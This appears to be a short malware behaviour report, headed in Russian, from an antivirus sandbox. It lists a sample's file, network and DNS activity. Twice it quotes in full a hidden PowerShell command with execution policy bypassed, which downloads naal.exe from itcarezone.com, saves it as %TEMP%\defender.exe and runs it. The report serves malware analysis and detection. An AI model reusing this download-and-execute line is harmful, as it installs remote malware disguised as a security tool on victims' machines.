Техническая информация
- http://www.itcarezone.com/xlrmp/files/naal.exe как %temp%\\defender.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.itcarezone.com/xlrmp/files/naal.exe','%TEMP%\\defender.exe') & %TEMP%\\defender.exe
- %TEMP%\defender.exe
- 'it###ezone.com':80
- http://www.it###ezone.com/xlrmp/files/naal.exe
- DNS ASK it###ezone.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.itcarezone.com/xlrmp/files/naal.exe','%TEMP%\\defender.exe') & %TEMP%\\defender.exe' (со скрытым окном)